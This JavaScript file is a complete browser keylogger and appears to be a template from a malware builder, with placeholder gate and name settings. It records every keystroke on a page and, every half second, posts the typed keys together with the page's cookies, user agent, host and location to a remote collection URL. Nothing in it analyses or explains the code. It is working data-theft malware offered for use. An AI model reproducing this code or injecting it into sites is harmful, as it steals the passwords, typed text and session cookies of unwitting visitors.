// Settings
var fluxGate = "{buildGate}";
var fluxName = "{buildName}";
var sendTimeout = 500;

// KEYLOGGER
var keys = "";
document.addEventListener("keydown", function(e) {
  var keyCode = e.keyCode;
  var keyName = e.key;
  
  // Check key
  switch(keyCode) {
    // ENTER
    case 13:
      keyName = "\n";
      break;
    // BACKSPACE
    case 8:
      keyName = "";
      keys = keys.slice(0, -1);
      break;
    // TAB
    case 9:
      keyName = "\n";
      break;
    // NORMAL KEY
    default:
      // Ignore Shift key
      if (keyCode === 16) {
        return;
      }
      
      // If is special key add < KEY >
      if (keyName.length > 1) {
        keyName = " <" + keyName + "> ";
      }
      break;
  }
  
  // Add
  keys += keyName;
});

// Save keylogs, useragents, ip, location, host, cookies.
var date = new Date();
var old = 0;

function saveAll() {
  // Check for new data
  if (old === keys.length) {
    // not send
    return;
  } else {
    // send
    old = keys.length;
  }

  var time = date.getHours() + ":" + date.getMinutes() + ":" + date.getSeconds();
  var uagents = window.navigator.userAgent;
  var host = window.location.hostname;
  var location = document.location;
  var cookies = document.cookie;

  var http = new XMLHttpRequest();
  var params = "keyLogs=" + keys + "&cookies=" + cookies + "&name=" + fluxName + "&uagents=" + uagents + "&location=" + location + "&host=" + host + "&time=" + time + "&sendLogs";
  http.open("POST", fluxGate, true);

  http.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
  http.send(params);
}

// Create loop
setInterval(function() {
  saveAll();
}, sendTimeout);
